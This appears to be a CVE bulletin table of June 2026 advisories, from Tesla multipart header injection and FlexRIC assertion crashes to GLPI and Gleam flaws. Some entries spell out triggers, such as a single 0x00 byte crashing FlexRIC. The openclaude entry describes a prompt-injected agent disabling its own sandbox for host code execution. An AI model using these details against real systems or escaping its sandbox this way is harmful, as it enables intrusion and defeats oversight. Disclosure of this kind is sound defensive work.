| elixir-tesla--tesla | Improper Encoding or Escaping of Output vulnerability in elixir-tesla tesla allows multipart part header injection via unescaped Content-Disposition parameter values. Tesla.Multipart.part_headers_for_disposition/1 interpolates each disposition parameter as #{k}="#{v}" with no validation of CR (\r), LF (\n), or double-quote characters. The values come verbatim from the caller via Tesla.Multipart.add_field/4 (the name parameter), Tesla.Multipart.add_file/3, and Tesla.Multipart.add_file_content/4 (both the filename parameter and other disposition opts). A " in the value closes the quoted parameter early; a \r\n ends the Content-Disposition header line and starts a new part header (such as a forged Content-Type), or, after a second \r\n, ends the entire part header block and prepends bytes to the part body. The default-filename path in add_file/3 derives the filename via Path.basename/1, which does not strip CR or LF, so any application forwarding a partially-attacker-controlled file path inherits the same issue. This issue affects tesla: from 0.8.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48598 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-28jh-g32x-v9v4 https://cna.erlef.org/cves/CVE-2026-48598.html https://osv.dev/vulnerability/EEF-CVE-2026-48598 https://github.com/elixir-tesla/tesla/commit/bb1a2c3da2775924d96e3db8e315dcc4d5d2246e |
| Ericsson--Packet Core Gateway (PCG) | Ericsson Packet Core Gateway (PCG) versions prior to 1.30 contain an Improper Handling of Syntactically Invalid Structure (CWE-228) vulnerability where an attacker continuously sending a specially crafted message can cause service degradation. The impact continues as long the attack persists but the system recovers from the crashes when the attack stops. | 2026-06-05 | not yet calculated | CVE-2026-25657 | https://www.ericsson.com/en/about-us/security/psirt/cve-2026-25657 |
| Ericsson--Packet Core Gateway (PCG) | Ericsson Packet Core Gateway (PCG) versions prior to 1.30 contain an Improper Handling of Missing Values (CWE-230) vulnerability where an attacker continuously sending a specially crafted message can cause service degradation. The impact continues as long the attack persists but the system recovers from the crashes when the attack stops. | 2026-06-05 | not yet calculated | CVE-2026-25658 | https://www.ericsson.com/en/about-us/security/psirt/cve-2026-25658 |
| Ericsson--Packet Core Gateway (PCG) | Ericsson Packet Core Gateway (PCG) versions prior to 1.30 contain an Improper Handling of Missing Values (CWE-230) vulnerability where an attacker continuously sending a specially crafted message can cause service degradation. The impact continues as long the attack persists but the system recovers from the crashes when the attack stops. | 2026-06-05 | not yet calculated | CVE-2026-25659 | https://www.ericsson.com/en/about-us/security/psirt/cve-2026-25659 |
| ESA--AnomalyMatch | An issue in ESA AnomalyMatch before 1.3.1 allow attackers to execute arbitrary code via crafted model checkpoint files. The affected components load model files from session directories using torch.load() with unrestricted deserialization. | 2026-06-01 | not yet calculated | CVE-2026-38950 | https://github.com/esa/AnomalyMatch/pull/9 https://imlabs.info/research/security_advisory_esa_anomaly_match_unsafe_deserialization_cve_2026_38950_ivan_markovic_052026.html https://github.com/Accenture/AARO-Bugs/blob/master/AARO-CVE-List.md |
| Etoile Web Design Incorporated--Five Star Restaurant Reservations | Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14. | 2026-06-02 | not yet calculated | CVE-2026-42670 | https://patchstack.com/database/wordpress/plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-14-payment-bypass-vulnerability?_s_id=cve |
| FastNetMon--FastNetMon | FastNetMon Community Edition through 1.2.9 contains an out-of-bounds read in the IPv4 packet parser. In src/simple_packet_parser_ng.cpp, after validating that the packet contains at least sizeof(ipv4_header_t) bytes (20 bytes), the code advances the local_pointer by '4 * ipv4_header->get_ihl()' (line 164) without validating that (a) IHL >= 5 (the minimum valid value per RFC 791), or (b) 4 * IHL bytes are actually available in the packet. The IHL field is 4 bits, allowing values 0-15, so the advance can be 0-60 bytes. An IHL value of 15 with only 20 bytes validated causes a 40-byte over-read. An IHL of 0-4 causes the pointer to not advance past the IP header, resulting in the TCP/UDP header being parsed from IP header data (type confusion). This vulnerability is reachable via any packet capture interface. | 2026-06-02 | not yet calculated | CVE-2026-48682 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/simple_packet_parser_ng.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48682-ipv4-parser-oob |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when an SCTP association is closed before an E2_SETUP_REQUEST is sent. The near-RT RIC assumes a mapping between SCTP association and E2 node always exists in the cleanup path and enforces this via assert(). A remote unauthenticated attacker can crash the near-RT RIC (port 36421) by simply completing an SCTP handshake and immediately disconnecting, without sending any E2AP message. | 2026-06-01 | not yet calculated | CVE-2026-37220 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37220.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when receiving a RIC_SUBSCRIPTION_RESPONSE with an unknown ric_id that has no corresponding pending event. The near-RT RIC uses assert() to enforce the existence of a pending event during response processing. A remote unauthenticated attacker can send a forged RIC_SUBSCRIPTION_RESPONSE to the near-RT RIC (port 36421) to cause SIGABRT in Debug builds or NULL pointer dereference (SIGSEGV) in Release builds. | 2026-06-01 | not yet calculated | CVE-2026-37221 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37221.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 uses hardcoded assertions to validate Information Element (IE) counts in decoded E2AP messages. A remote unauthenticated attacker can send a valid E2AP PDU containing an unexpected number of IEs (e.g., an E2setupRequest with extra optional fields) to crash the near-RT RIC (port 36421) or iApp (port 36422) via SIGABRT. The code asserts exact IE counts rather than validating against protocol-specified ranges. | 2026-06-01 | not yet calculated | CVE-2026-37222 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37222.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains a reachable assertion in the iApp message dispatcher. The dispatcher validates incoming E2AP messages against a 9-entry whitelist using assert(). A remote unauthenticated attacker can send any decodable E2AP PDU with a message type not in the whitelist to crash the iApp process (port 36422) via SIGABRT. Since iApp and the near-RT RIC share one process, this terminates the entire RIC service and disconnects all E2 Nodes and xApps. | 2026-06-01 | not yet calculated | CVE-2026-37223 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37223.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when receiving a duplicate E2_SETUP_REQUEST from the same or spoofed E2 Node. The iApp registry enforces node ID uniqueness via assert() rather than graceful rejection. A remote unauthenticated attacker can crash the iApp process (port 36421) by sending two E2_SETUP_REQUESTs with the same E2 node configuration, triggering SIGABRT. | 2026-06-01 | not yet calculated | CVE-2026-37224 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37224.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when the iApp receives an E42_RIC_SUBSCRIPTION_REQUEST with an empty ricEventTriggerDefinition field. The E42 layer decoder accepts this as valid, but the E2AP encoder asserts a non-empty constraint when forwarding the request. A remote unauthenticated attacker can crash the iApp process (port 36422) via SIGABRT by exploiting this cross-layer validation mismatch. | 2026-06-01 | not yet calculated | CVE-2026-37225 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37225.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when the iApp receives an E42_RIC_SUBSCRIPTION_REQUEST referencing a non-existent E2 Node. The lookup function returns NULL, which is enforced by assert() in Debug builds (SIGABRT) and dereferenced in Release builds (SIGSEGV). A remote unauthenticated attacker can crash the iApp process (port 36422) by sending a subscription request with an arbitrary global_e2_node_id. | 2026-06-01 | not yet calculated | CVE-2026-37226 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37226.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains reachable assert(0) calls in stub message handlers for whitelisted but unimplemented E2AP message types in the near-RT RIC. A remote unauthenticated attacker can send a decodable E2AP PDU of such a type (e.g., E2nodeConfigurationUpdate) to crash the near-RT RIC process (port 36421) via SIGABRT. The message passes whitelist validation but triggers an unconditional assertion in the handler. | 2026-06-01 | not yet calculated | CVE-2026-37227 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37227.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains a reachable assertion in e2ap_recv_sctp_msg() (src/lib/ep/e2ap_ep.c). The function allocates a fixed 32KB receive buffer and enforces assert(rc < len) on the sctp_recvmsg() return value. A remote unauthenticated attacker can send a single SCTP message with payload >= 32,768 bytes to crash the near-RT RIC, iApp, E2 Agent, or xApp process via SIGABRT. No valid E2AP PDU is required. All four SCTP endpoint types (ports 36421 and 36422) share this vulnerable code path. In Release builds (NDEBUG), the stripped assertion leads to a signed-to-unsigned integer overflow and potential out-of-bounds read. | 2026-06-01 | not yet calculated | CVE-2026-37228 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37228.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains a reachable assertion in e2ap_create_pdu() triggered when ASN.1 PER decoding fails. A remote unauthenticated attacker can send any non-PER byte sequence (e.g., a single 0x00 byte) over SCTP to the near-RT RIC (port 36421) or iApp (port 36422) to crash the process via SIGABRT. The assertion is reached before any protocol-level validation occurs. All three E2AP protocol versions (v1.01, v2.03, v3.01) are affected. | 2026-06-01 | not yet calculated | CVE-2026-37229 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37229.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when the near-RT RIC receives a RIC_INDICATION message with a ran_func_id that does not exist in its registry. The lookup returns NULL, triggering assert() in Debug builds (SIGABRT) or NULL pointer dereference in Release builds (SIGSEGV). A remote unauthenticated attacker can crash the near-RT RIC (port 36421) by sending a crafted RIC_INDICATION with an arbitrary ran_func_id value. | 2026-06-01 | not yet calculated | CVE-2026-37230 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37230.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 uses a uint16_t counter for xapp_id assignment but stores the value in uint32_t message fields. After 65,530+ E42_SETUP_REQUESTs, the 16-bit counter wraps around and produces duplicate xapp_ids. The iApp (port 36422) crashes when attempting to register a duplicate ID in its internal data structure. A remote attacker can trigger this by repeatedly connecting and requesting new xApp registrations. | 2026-06-01 | not yet calculated | CVE-2026-37231 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37231.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains an authorization bypass in the iApp's xApp isolation mechanism. The equality function eq_xapp_ric_gen_id() in src/ric/iApp/xapp_ric_id.c compares m0->xapp_id against itself (m0->xapp_id) instead of the other argument (m1->xapp_id), effectively ignoring the xApp identity dimension. A malicious xApp connected to the iApp (port 36422) can delete any other xApp's subscriptions by sending an E42_RIC_SUBSCRIPTION_DELETE_REQUEST with a matching ric_gen_id. This breaks multi-tenant isolation in any deployment with multiple xApps sharing the same RIC. | 2026-06-01 | not yet calculated | CVE-2026-37233 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37233.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 allows a single SCTP connection to bind multiple xapp_ids by sending multiple E42_SETUP_REQUESTs. On disconnect, only the first registered xapp_id's resources are cleaned up; subsequent xapp_ids and their subscriptions remain as stale entries. A remote attacker can exploit this to leak subscription state in the iApp, potentially causing resource exhaustion or state corruption over time. | 2026-06-01 | not yet calculated | CVE-2026-37234 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37234.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 trusts the xapp_id field from E42 message payloads without binding it to the sender's SCTP association. The validation function valid_xapp_id() only checks that the value is within the assigned range. A remote unauthenticated attacker can impersonate any xApp by specifying their xapp_id in requests sent to the iApp (port 36422), causing responses to be misrouted to the victim xApp. This can crash the victim xApp, the RIC, or the iApp itself through state inconsistencies in the red-black tree data structure. | 2026-06-01 | not yet calculated | CVE-2026-37235 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37235.md |
| Forcepoint--VPN Client | A local privilege escalation vulnerability exists in Forcepoint VPN Client that allows a local non-administrative user to escalate privileges to SYSTEM. This issue affects VPN Client for Windows: versions 6.11.3 and prior. | 2026-06-04 | not yet calculated | CVE-2025-12694 | https://support.forcepoint.com/s/article/Security-Advisory-Local-Privilege-Escalation-in-VPN-Client-for-Windows |
| FOSSBilling--FOSSBilling | FOSSBilling is a free, open-source billing and client management system. Versions prior to 0.8.0 leak the exact system version through asset cache buster parameters in HTML output, bypassing the `hide_version_public` security setting. The FOSSBilling version is embedded in the query string of every `<script>` and `<link>` tag generated by the `script_tag` and `stylesheet_tag` Twig filters. This information is visible to all visitors - including unauthenticated guests - on every page, regardless of whether the `hide_version_public` setting is enabled. The `X-FOSSBilling-Version` HTTP header and the `guest.system.version` API endpoint correctly honour the `hide_version_public` setting, but the asset cache buster parameters were overlooked. Knowledge of the exact FOSSBilling version makes it significantly easier for malicious actors to identify known vulnerabilities applicable to a given installation and craft targeted exploits. While not a direct vulnerability on its own, it undermines the intended protection offered by the `hide_version_public` setting and facilitates reconnaissance. Version 0.8.0 contains a patch. There is no practical workaround that removes the version from asset URLs without modifying source code. | 2026-06-03 | not yet calculated | CVE-2026-40495 | https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-gqcp-g7rm-p5v6 https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0 |
| FOSSBilling--FOSSBilling | FOSSBilling is a free, open-source billing and client management system. Prior to version 0.8.0, the Redirect module does not validate the URL scheme of administrator-configured destination URLs before storing or issuing redirects. This allows arbitrary external URLs to be configured as redirect targets, creating an open redirect vulnerability exploitable for phishing attacks. Users following a legitimate FOSSBilling URL can be silently redirected to an attacker-controlled external site. The redirect is issued as a 301 (Moved Permanently) response, which browsers cache persistently, amplifying the impact. Exploitation requires administrator privileges to create or modify redirect entries, limiting practical attack scenarios to multi-admin environments or compromised admin accounts. Version 0.8.0 fixes the issue. Some workarounds are available. Restrict admin access to the Redirect module to trusted administrators only and/or audit existing redirect entries in the database (the `extension_meta` table with `extension = 'mod_redirect'`) for any unexpected or external target URLs. | 2026-06-03 | not yet calculated | CVE-2026-43924 | https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-v8rf-g37v-vgpx https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0 |
| FOSSBilling--FOSSBilling | FOSSBilling is a free, open-source billing and client management system. Prior to version 0.8.0, the password reset confirmation endpoint `/client/reset-password-confirm/:hash` is handled by a non-API controller and is not covered by FOSSBilling's rate limiter, which only applies to `/api/*` routes. This allows an attacker to probe the endpoint for valid reset tokens without any per-IP request limiting, attempt counting, or lockout mechanism. The endpoint acts as an oracle, returning a distinguishable response for valid versus invalid tokens (HTTP 200 vs HTTP 302 redirect). An attacker can submit unlimited token guesses to the password reset confirmation endpoint with no throttling applied. However, practical exploitability is significantly mitigated by the current token generation, which uses `hash('sha256', random_bytes(32))`, providing 256 bits of entropy. Tokens also expire after 15 minutes and are deleted after successful use. The same architectural gap applies to other controller-served auth routes, including `/staff/email/:hash` (admin password reset confirmation) and `/client/confirm-email/:hash` (email confirmation). Version 0.8.0 fixes the issue. Some workarounds are available. Configure a reverse proxy (e.g., Nginx, Apache, Cloudflare) to apply per-IP rate limiting to the `/client/reset-password-confirm/*` and `/staff/email/*` paths and/or use a WAF rule to limit request rates to these endpoints. | 2026-06-04 | not yet calculated | CVE-2026-43926 | https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-cqqm-p3x5-9fqg https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0 |
| Frappe--ERPNext | An authenticated ERPNext user with Item record edit permissions can persist arbitrary HTML/JavaScript in the item_name, description, or image fields of an Item and trigger unescaped rendering in the Point of Sale (POS) cart interface for every operator who adds that item to a transaction.This issue affects ERPNext: 16.16.0. | 2026-06-03 | not yet calculated | CVE-2026-42839 | https://fluidattacks.com/es/advisories/pink https://github.com/frappe/erpnext |
| Frappe--ERPNext | An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a Customer record and trigger unescaped rendering in the Point of Sale (POS) interface for every operator who selects that customer. This issue affects ERPNext: 16.16.0. | 2026-06-03 | not yet calculated | CVE-2026-42840 | https://fluidattacks.com/es/advisories/weeknd https://github.com/frappe/erpnext |
| froxlor--froxlor | Froxlor is open source server administration software. Version 2.3.6 lets administrators configure `system.available_shells` as the approved shell list that customers may assign to FTP users. However, the server-side FTP account handlers do not enforce that whitelist when processing add or edit requests. As a result, an authenticated customer with shell delegation enabled can submit an arbitrary shell such as `/bin/bash` even when the panel UI only offers more restricted choices. In deployments that use the default `nssextrausers` integration, the attacker-controlled shell is then propagated into the system account database, leading to real host shell access. Version 2.3.7 fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-41235 | https://github.com/froxlor/froxlor/security/advisories/GHSA-gcv3-5v9q-fmhh https://github.com/froxlor/froxlor/releases/tag/2.3.7 |
| froxlor--froxlor | Froxlor is open source server administration software. In version 2.3.6 and earlier, the LOC record regex uses `\s+` which matches newlines (allowing embedded newlines to pass), TLSA `matchingType=0` has no upper bound on hex data length, and all validators return raw input without zone-file escaping. Version 2.3.7 contains an updated patch. | 2026-06-04 | not yet calculated | CVE-2026-41237 | https://github.com/froxlor/froxlor/security/advisories/GHSA-j6fm-9rfm-j5hx https://github.com/froxlor/froxlor/commit/b34829262dc3 https://github.com/froxlor/froxlor/releases/tag/2.3.7 |
| FRRouting--FRRouting | Missing input validation in the rfapiRibBi2Ri() function (rfapi_rib.c) of FRRouting (FRR) stable/10.0 to stable/10.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-06-03 | not yet calculated | CVE-2026-37460 | https://github.com/FRRouting/frr/pull/21098%2C https://github.com/FRRouting/frr https://github.com/FRRouting/frr/commit/7676cad65114aa23adde58 |
| Fsas Technologies Inc.--ServerView Agents for Windows | Incorrect permission assignment for critical resource issue exists in ServerView Agents for Windows V11.60.04 and earlier. If this vulnerability is exploited, a local authenticated attacker who can log in to the server where the affected product is installed may obtain SYSTEM privilege. | 2026-06-01 | not yet calculated | CVE-2026-27788 | https://www.fsastech.com/ja-jp/resources/security/2026/0529.html https://jvn.jp/en/jp/JVN67883085/ |
| Fsas Technologies Inc.--ServerView Agents for Windows | Privilege chaining issue exists in ServerView Agents for Windows V11.60.04 and earlier. If this vulnerability is exploited, a local authenticated attacker who can log in to the server where the affected product is installed may obtain SYSTEM privilege. | 2026-06-01 | not yet calculated | CVE-2026-32325 | https://www.fsastech.com/ja-jp/resources/security/2026/0529.html https://jvn.jp/en/jp/JVN67883085/ |
| Gitlawb--openclaude | OpenClaude is an open-source coding-agent command line interface for cloud and local model providers. Prior to version 0.5.1, the dangerouslyDisableSandbox parameter is exposed as part of the BashTool input schema, meaning the LLM (an untrusted principal per the project's own threat model) can set it to true in any tool_use response. Combined with the default allowUnsandboxedCommands: true setting, a prompt-injected model can escape the sandbox for any arbitrary command, achieving full host-level code execution. This issue has been patched in version 0.5.1. | 2026-06-02 | not yet calculated | CVE-2026-42074 | https://github.com/Gitlawb/openclaude/security/advisories/GHSA-m77w-p5jj-xmhg https://github.com/Gitlawb/openclaude/pull/778 https://github.com/Gitlawb/openclaude/commit/aab489055c53dd64369414116fe93226d2656273 |
| Gleam--Gleam | Path traversal vulnerability in Gleam's handling of custom documentation pages allows arbitrary file read and file write outside the intended documentation output directory. The documentation.pages entries from gleam.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended project and documentation output directories. The documentation.pages[].path field can be used to write generated documentation files outside the intended build/dev/docs/<package>/ output directory. The documentation.pages[].source field can be used to read files outside the project directory and embed their contents into generated documentation output. An attacker who can convince a victim to run gleam docs build on an untrusted project, or with untrusted gleam.toml content, can cause local files readable by the victim to be included in generated documentation artifacts, and can cause generated documentation files to be written outside the intended docs output directory. This issue affects Gleam from 1.16.0 until 1.17.0. | 2026-06-02 | not yet calculated | CVE-2026-32685 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-wjx8-7w8m-p4v7 https://cna.erlef.org/cves/CVE-2026-32685.html https://osv.dev/vulnerability/EEF-CVE-2026-32685 https://github.com/gleam-lang/gleam/commit/81570611906b6b0039c948037094d09a68700f3a https://github.com/gleam-lang/gleam/commit/c9230cd3045de8fd8481dae3a4557c0146df1430 |
| Gleam--Gleam | Symlink following vulnerability in Gleam's Hex package export allows files outside the project root to be embedded in the generated package tarball. The file collection helpers (gleam_files, native_files, private_files) in compiler-cli/src/fs.rs use follow_links(true) when walking publishable directories such as src/ and priv/. The collected paths are added to the package archive via add_path_to_tar in compiler-cli/src/publish.rs without verifying that the resolved target remains within the project root. A symlink placed under a publishable directory will cause gleam export hex-tarball or gleam publish to embed the contents of the symlink target into the generated Hex package. An attacker with write access to the project repository can place a symlink in src/ or priv/ pointing to an arbitrary file. When a maintainer or CI pipeline runs gleam publish or gleam export hex-tarball, local files readable by the publisher (such as secrets, tokens, or SSH keys) are silently embedded into the published package artifact. This issue affects Gleam from 0.10.0-rc1 until 1.17.0. | 2026-06-02 | not yet calculated | CVE-2026-42795 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-qhh5-fg4c-8gqc https://cna.erlef.org/cves/CVE-2026-42795.html https://osv.dev/vulnerability/EEF-CVE-2026-42795 https://github.com/gleam-lang/gleam/commit/6435a5528b9ae0449e2f32be579641ec485f6866 |
| Gleam--Gleam | Path traversal vulnerability in Gleam's dependency management allows arbitrary directory deletion via malicious build/packages/packages.toml content. Package keys read from build/packages/packages.toml by LocalPackages::read_from_disc are passed without validation to paths.build_packages_package(), which constructs a filesystem path by joining the project build directory with the attacker-controlled key. The resulting path is then passed to fs::delete_directory (which calls remove_dir_all). No check is performed to ensure the path remains within the intended build/packages/ directory. Both absolute paths and relative traversal sequences (e.g. ../) are accepted as package keys, allowing deletion of arbitrary directories. An attacker who can cause a victim to run gleam deps download on a project containing a malicious build/packages/packages.toml (e.g. by committing the normally-gitignored file to a repository) can cause arbitrary directories on the victim's system to be recursively deleted. This issue affects Gleam from 0.18.0-rc1 until 1.17.0. | 2026-06-02 | not yet calculated | CVE-2026-43965 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-jqvf-f6p2-wrv3 https://cna.erlef.org/cves/CVE-2026-43965.html https://osv.dev/vulnerability/EEF-CVE-2026-43965 https://github.com/gleam-lang/gleam/commit/690ca069817bee5f77a28fc3e360627c1da19291 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, a technician can store an XSS payload in a ITIL costs. This issue has been fixed in version 11.0.7. | 2026-06-02 | not yet calculated | CVE-2026-40108 | https://github.com/glpi-project/glpi/security/advisories/GHSA-rhmv-j773-4gvh |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 0.78 and prior to versions 10.0.25 and 11.0.7, a technician can delete arbitrary files from the filesystem as long as the webserver has write rights on them. Upgrade to 10.0.25 or 11.0.7 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-42317 | https://github.com/glpi-project/glpi/security/advisories/GHSA-jf72-cvjh-px5w |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to versions 10.0.25 and 11.0.7, low privilege users with access to planning can delete any object in GLPI. Upgrade to 11.0.7 or 10.0.25 to receive a patch. As a workaround, disable delete rights for User's planning. | 2026-06-03 | not yet calculated | CVE-2026-42318 | https://github.com/glpi-project/glpi/security/advisories/GHSA-w7mr-3vwm-2j22 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 0.50 and prior to versions 10.0.25 and 11.0.7, a technician can read arbitrary files inside the GLPI_DOC_DIR. Upgrade to 10.0.25 or 11.0.7 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-42320 | https://github.com/glpi-project/glpi/security/advisories/GHSA-58j6-94cf-gcx5 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 10.0.4 and prior to version 10.0.25, a technician can store an XSS payload in the asset locked tab. Upgrade to 10.0.25 or 11.0.7 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-42321 | https://github.com/glpi-project/glpi/security/advisories/GHSA-hwjc-8228-55x4 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 0.78 and prior to versions 10.0.25 and 11.0.7, an authenticated user with config READ permission can read a specific asset object. Upgrade to 11.0.7 or 10.0.25 to receive a patch. | 2026-06-03 | not yet calculated | CVE-2026-44281 | https://github.com/glpi-project/glpi/security/advisories/GHSA-prjc-xwmh-rhxw |
| glpi-project--glpi | An unauthenticated user with write access to the knowledge base can store an XSS payload in a knowledge base item. This issue affects glpi: before 11.0.7. | 2026-06-02 | not yet calculated | CVE-2026-5385 | https://fluidattacks.com/es/advisories/bizkit https://github.com/glpi-project/glpi https://github.com/glpi-project/glpi/security/advisories/GHSA-2fg5-jg72-h338 https://github.com/glpi-project/glpi/releases/tag/11.0.7 |
| GNCC--GP5 v7.1.76 | GNCC GP5 v7.1.76 was discovered to store sensitive wireless network information in plaintext during routine operations to the serial console. This issue allows physically-proximate attackers to obtain sensitive information, including network credentials, via monitoring the serial UART interface. | 2026-06-04 | not yet calculated | CVE-2026-36174 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | An issue in the U-Boot component of GNCC GP5 v7.1.76 allows physically-proximate attackers to bypass authentication and gain root access via interrupting the boot sequence and injecting a crafted string into the kernel boot arguments. | 2026-06-04 | not yet calculated | CVE-2026-36175 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | GNCC GP5 v7.1.76 was discovered to store pre-signed Backblaze B2 upload URLs (PUT requests) in plaintext to the serial console. This allows physically-proximate attackers to extract these active tokens to perform unauthorized operations via monitoring the serial UART interface. | 2026-06-04 | not yet calculated | CVE-2026-36176 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | The factory reset functionality in GNCC GP5 v7.1.76 fails to clear sensitive cryptographic material in the JFFS2 configuration partition, possibly allowing attackers to recover and obtain sensitive user data. | 2026-06-04 | not yet calculated | CVE-2026-36178 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | A lack of runtime integrity in GNCC GP5 v7.1.76 allows physically-proximate attackers to bypass file system read-only protections and modify system files and binaries for the duration of a boot session via a bind-mount attack. | 2026-06-04 | not yet calculated | CVE-2026-36180 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| GNCC--GP5 v7.1.76 | GNCC GP5 v7.1.76 was discovered to utilize a weak hashing algorithm to protect the root password, possibly allowing attackers to obtain root credentials and privileges via a bruteforce attack. | 2026-06-04 | not yet calculated | CVE-2026-36182 | http://gncc.com http://gp5.com https://github.com/BadChemical/IoT-Vulnerability-Research-Public/blob/main/GNCC-GP5-T23/README.md |
| Go standard library--crypto/x509 | (*x509.Certificate).VerifyHostname previously called matchHostnames in a loop over all DNS Subject Alternative Name (SAN) entries. This caused strings.Split(host, ".") to execute repeatedly on the same input hostname. With a large DNS SAN list, verification costs scaled quadratically based on the number of SAN entries multiplied by the hostname's label count. Because x509.Verify validates hostnames before building the certificate chain, this overhead occurred even for untrusted certificates. | 2026-06-02 | not yet calculated | CVE-2026-27145 | https://go.dev/cl/783621 https://go.dev/issue/79694 https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw https://pkg.go.dev/vuln/GO-2026-5037 |
| Go standard library--mime | Decoding a maliciously-crafted MIME header containing many invalid encoded-words can consume excessive CPU. | 2026-06-02 | not yet calculated | CVE-2026-42504 | https://go.dev/issue/79217 https://go.dev/cl/774481 https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw https://pkg.go.dev/vuln/GO-2026-5038 |
